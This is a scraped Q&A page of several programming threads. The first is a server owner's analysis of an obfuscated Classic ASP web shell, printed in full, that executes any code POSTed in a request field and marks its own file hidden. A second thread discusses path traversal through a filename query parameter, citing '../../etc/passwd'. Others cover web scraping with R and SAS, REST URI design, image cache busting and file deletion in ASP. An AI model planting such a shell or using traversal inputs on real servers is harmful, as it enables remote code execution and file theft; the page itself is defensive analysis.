VB malware tool reverse-engineering - asp.net

I have found interesting malware on my server, which did some bad thing.
Now I am trying to reverse-engineering it, but due to complete lack of knowledge of VB\ASP I need to ask your help, colleagues.
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/srerif/*/(tseuqer lave")
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))
if f.attributes <> 39 then
f.attributes = 39
end if
%>
As I understood - it executes some command and creates file somewhere with system\hidden attributes.
The main question is - how to use it, i.e. from logs I see, that hacker uploaded this file and used POST to command this. I want to command this too to understand, how he was able to upload files to some folders, which he should be able to do so.
Any advices are welcome. Sample with curl POST would be amazing.

No don't need knowledge in VB to research what that code does; just read the documentation.
MorfiCoder(")/*/srerif/*/(tseuqer lave") returns eval request("firers") (I assume functions like Replace or StrReverse are obvious).
Execute and eval are self-explanatory; the docs for request are here:
The Request object retrieves the values that the client browser passed to the server during an HTTP request.
So, whatever string is in the firers request variable, it will be executed (you said you already know that your attacker used a simply POST to send data to his script).
Set fso=CreateObject("Scripting.FileSystemObject") creates a FileSystemObject Object.
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")) creates a File Object; using the path in PATH_TRANSLATED.
Then some attributes (Archive, System, Hidden, ReadOnly) are set on that file object (to hide this script).
Why your attacker was able to upload this file to your server obviously can't be answered by the information you provided, and would also be out of scope of this question and probably off topic to stackoverflow.

Related

Attack via filename passed in url query?

I wrote a small service in go (although I don't think this would be a language specific issue), that caches some results by saving it to a file, and writing a URL query parameter into the filename with "prefix" + param + ".json" using ioutil.WriteFile. The service runs on Ubuntu.
Is it possible to do something malicious, by passing an unexpected string via the query?
Relevant attacks that come to mind are called path injection. For example what if the query parameter is something like ../../etc/passwd (okthis would probably not work as the user running this service would have no permissions, but you get the point). For example it could be possible to overwrite your service code itself.
You should sanitize the parameter before adding it to the filename. The best would be a strict whitelist of letters and numbers that are allowed, anything else should ve removed from the parameter. That way injection would not be possible.
You can also check whether the path you are writing to is actually under an explicitly allowed directory.
I will make a test in python, here is the struct of the project
app1/main.py
while True:
a = input() # passing query
with open("{}.json".format(a), "w") as f:
f.write("Hello world")
now i am a hacker, and i want to change "yourfile.json"
so i passed this
and than, the content of yourfile.json become: Hello world

Writing a function that scrapes dataset that appears only after typing in values and clicking a button

I am trying to write a function that will take a list of dates and retrieve the dataset as found on https://www.treasurydirect.gov/GA-FI/FedInvest/selectSecurityPriceDate.htm
I am using PROC IML in SAS to execute R-code (since I am more familiar with R).
My problem is within R, and is due to the website.
First, I am aware that there is an API but this is an exercise I really want to learn because many sites do not have APIs.
Does anyone know how to retrieve the datasets?
Things I've heard:
Use RSelenium to program the clicking. RSelenium got taken off of the archive recently so that isn't an option (even downloading it off of a previous version is causing issues).
Look at the XML url changes as I click the "submit" button in Chrome. However, the XML in the Network tab doesn't show anything, whereas on other websites that have different methods of searching do.
I have been looking for a solution all day, but to no avail! Please help
First, you need to read the terms and conditions and make sure that you are not breaking the rules when scraping.
Next, if there is an API, you should use it so that they can better manage their data usage and operations.
In addition, you should also limit the number of requests made so as not to overload the server. If I am not wrong, this is related to DNS Denial of Service attacks.
Finally, if those above conditions are satisfied, you can use the inspector on Chrome to see what HTTP requests are being made when you browse these webpages.
In this particular case, you do not need RSelenium and a simple HTTP POST will do
library(httr)
resp <- POST("https://www.treasurydirect.gov/GA-FI/FedInvest/selectSecurityPriceDate.htm",
body=list(
priceDate.month=5,
priceDate.day=15,
priceDate.year=2018,
submit="CSV+Format"
),
encode="form")
read.csv(text=rawToChar(resp$content), header=FALSE)
You can perform the same http processing in a SAS session using Proc HTTP. The CSV data does not contain a header row, so perhaps the XML Format is more appropriate. There are a couple of caveats for the treasurydirect site.
Prior to posting a data download request the connection needs some cookies that are assigned during a GET request. Proc HTTP can do this.
The XML contains an extra tag container <bpd> that the SAS XMLV2 library engine can't handle simply. This extra tag can be removed with some DATA step processing.
Sample code for XML
filename response TEMP;
filename respfilt TEMP;
* Get request sets up fresh session and cookies;
proc http
clear_cache
method = "get"
url ="https://www.treasurydirect.gov/GA-FI/FedInvest/selectSecurityPriceDate.htm"
;
run;
* Post request as performed by XML format button;
* automatically utilizes cookies setup in GET request;
* in= can now directly specify the parameter data to post;
proc http
method = "post"
in = 'priceDate.year=2018&priceDate.month=5&priceDate.day=15&submit=XML+Format'
url ="https://www.treasurydirect.gov/GA-FI/FedInvest/selectSecurityPriceDate.htm"
out = response
;
run;
* remove bpd tag from the response (the downloaded xml);
data _null_;
infile response;
file respfilt;
input;
if _infile_ not in: ('<bpd', '</bpd');
put _infile_;
run;
* copy data collections from xml file to tables in work library;
libname respfilt xmlv2 ;
proc copy in=respfilt out=work;
run;
Reference material
REST at Ease with SAS®: How to Use SAS to Get Your REST
Joseph Henry, SAS Institute Inc., Cary, NC
http://support.sas.com/resources/papers/proceedings16/SAS6363-2016.pdf

Designing proper REST URIs

I have a Java component which scans through a set of folders (input/processing/output) and returns the list of files in JSON format.
The REST URL for the same is:
GET http://<baseurl>/files/<foldername>
Now, I need to perform certain actions on each of the files, like validate, process, delete, etc. I'm not sure of the best way to design the REST URLs for these actions.
Since its a direct file manipulation, I don't have any unique identifier for the files, except their paths. So I'm not sure if the following is a good URL:
POST http://<baseurl>/file/validate?path=<filepath>
Edit: I would have ideally liked to use something like /file/fileId/validate. But the only unique id for files is its path, and I don't think I can use that as part of the URL itself.
And finally, I'm not sure which HTTP verb to use for such custom actions like validate.
Thanks in advance!
Regards,
Anand
When you implement a route like http:///file/validate?path you encode the action in your resource that's not a desired effect when modelling a resource service.
You could do the following for read operations
GET http://api.example.com/files will return all files as URL reference such as
http://api.example.com/files/path/to/first
http://api.example.com/files/path/to/second
...
GET http://api.example.com/files/path/to/first will return validation results for the file (I'm using JSON for readability)
{
name : first,
valid : true
}
That was the simple read only part. Now to the write operations:
DELETE http://api.example.com/files/path/to/first will of course delete the file
Modelling the file processing is the hard part. But you could model that as top level resource. So that:
POST http://api.example.com/FileOperation?operation=somethingweird will create a virtual file processing resource and execute the operation given by the URL parameter 'operation'. Modelling these file operations as resources gives you the possibility to perform the operations asynchronous and return a result that gives additional information about the process of the operation and so on.
You can take a look at Amazon S3 REST API for additional examples and inspiration on how to model resources. I can highly recommend to read RESTful Web Services
Now, I need to perform certain actions on each of the files, like validate, process, delete, etc. I'm not sure of the best way to design the REST URLs for these actions. Since its a direct file manipulation, I don't have any unique identified for the files, except their paths. So I'm not sure if the following is a good URL: POST http:///file/validate?path=
It's not. /file/validate doesn't describe a resource, it describes an action. That means it is functional, not RESTful.
Edit: I would have ideally liked to use something like /file/fileId/validate. But the only unique id for files is its path, and I don't think I can use that as part of the URL itself.
Oh yes you can! And you should do exactly that. Except for that final validate part; that is not a resource in any way, and so should not be part of the path. Instead, clients should POST a message to the file resource asking it to validate itself. Luckily, POST allows you to send a message to the file as well as receive one back; it's ideal for this sort of thing (unless there's an existing verb to use instead, whether in standard HTTP or one of the extensions such as WebDAV).
And finally, I'm not sure which HTTP verb to use for such custom actions like validate.
POST, with the action to perform determined by the content of the message that was POSTed to the resource. Custom “do something non-standard” actions are always mapped to POST when they can't be mapped to GET, PUT or DELETE. (Alas, a clever POST is not hugely discoverable and so causes problems for the HATEOAS principle, but that's still better than violating basic REST principles.)
REST requires a uniform interface, which in HTTP means limiting yourself to GET, PUT, POST, DELETE, HEAD, etc.
One way you can check on each file's validity in a RESTful way is to think of the validity check not as an action to perform on the file, but as a resource in its own right:
GET /file/{file-id}/validity
This could return a simple True/False, or perhaps a list of the specific constraint violations. The file-id could be a file name, an integer file number, a URL-encoded path, or perhaps an unencoded path like:
GET /file/bob/dir1/dir2/somefile/validity
Another approach would be to ask for a list of the invalid files:
GET /file/invalid
And still another would be to prevent invalid files from being added to your service in the first place, ie, when your service processes a PUT request with bad data:
PUT /file/{file-id}
it rejects it with an HTTP 400 (Bad Request). The body of the 400 response could contain information on the specific error.
Update: To delete a file you would of course use the standard HTTP REST verb:
DELETE /file/{file-id}
To 'process' a file, does this create a new file (resource) from one that was uploaded? For example Flickr creates several different image files from each one you upload, each with a different size. In this case you could PUT an input file and then trigger the processing by GET-ing the corresponding output file:
PUT /file/input/{file-id}
GET /file/output/{file-id}
If the processing isn't near-instantaneous, you could generate the output files asynchronously: every time a new input file is PUT into the web service, the web service starts up an asynchronous activity that eventually results in the output file being created.

stupid caching in asp.net

i use such code
string.Format("<img src='{0}'><br>", u.Avatar);
u.Avatar-it's like '/img/path/pic.jpg'
but in this site i can upload new image instead old pic.jpg. so picture new, but name is old. and browser show OLD picture (cache). if i put random number like /img/path/pic.jpg?123 then works fine, but i need it only ufter upload, not always. how can i solve this?
string imgUrl = _
string.Format("<img src='{0}?{1}'><br>", _
u.Avatar, _
FunctionThatLookupFileSystemForItsLastModified(u.Avatar).Ticks.ToString());
Instead of linking to the images directly, consider setting up a generic HTTP handler to serve the images.
MSDN: HTTP Handlers and HTTP Modules Overview
Stack Overflow: How to use output caching on .ashx handler
Append DateTime.Now.Ticks to the image url:
string imgUrl =
string.Format("<img src='{0}?{1}'><br>", u.Avatar,DateTime.Now.Ticks);
EDIT: I don' think this best practice are even a practice I would use. This is just a suggestion given the limited information given in case the Random implementation isn't truly Random.
Read your post again,,, sorry for general answer.
To workaround it do following
On Application_Start create a Dictionary with uploaded images save it on Application object, set it to null. Once you upload an image add it to this Dictionary. Wrap every place avatars appear on your website with function that evaluates image in Dictionary if found return imagename.jpg?randomnumber and then delete it from a Dictionary else return just an imagename.jpg.
This is going to be heavy because you will need to check each image in Dictionary but this will do exactly what you need.
You can set cache dependancy using the System.Web.Caching.CacheDependency namespace.
This can set the dependancy on the file uploaded, and will release the cache for that file automatically when the file changes.
There are lots of articles and stuff on MSDN and other places so I will not go into details on all that level of detail.
You can do inserts, deletes and other management of cache using the tools available.
(and this does not require you to change the file names or tack on stuff - it knows by the file system that the file changed)

Send file using Response.BinaryWrite() and delete it afterwards

As part of a Classic ASP Project the user should be able to download a file - which is dynamicly extracted from a zip archive and sent via Response.BinaryWrite() - by simply calling "document.asp?id=[some id here]".
Extracting and sending is not the problem but I need to delete the extracted file after the download finished. I never did any ASP or VBA before and I guess that's why I stuck here.
I tried deleting the file right after Response.WriteBinary() using FileSystemObject.DeleteFile() but this results in a 404-Error on the client-side.
How can I wait till the download finished and then do additional actions?
Edit: This is how my code looks like:
'Unzip a specified file from an archive and put it's path in *document*
set stream = Server.CreateObject("ADODB.Stream")
stream.Open
stream.Type = 1 ' binary
stream.LoadFromFile(document)
Response.BinaryWrite(stream.Read)
'Here I want to delete the *document*
I suspect that the point you are calling the DeleteFile method the file you are trying delete is currently locked by something else, the question is what?
Try including:-
stream.Close()
after your BinaryWrite. Also make sure you've done a similar thing to the component you've used to extract the file. If the component doesn't offer any obviouse "close" methods they trying assigning Nothing to the variables referencing them.
Is it not possible to stream the file into memory, then binary write the stream to the browser, this way the file is never created on the server and there is no need to delete it.
I found a solution: The extracted files are saved in a special directory and everytime a user runs the document.asp it checks this directory for files older than one hour and deletes them.
I think it's the simplest way to manage, but furthermore I would prefer a solution where the document is deleted after downloading.

Resources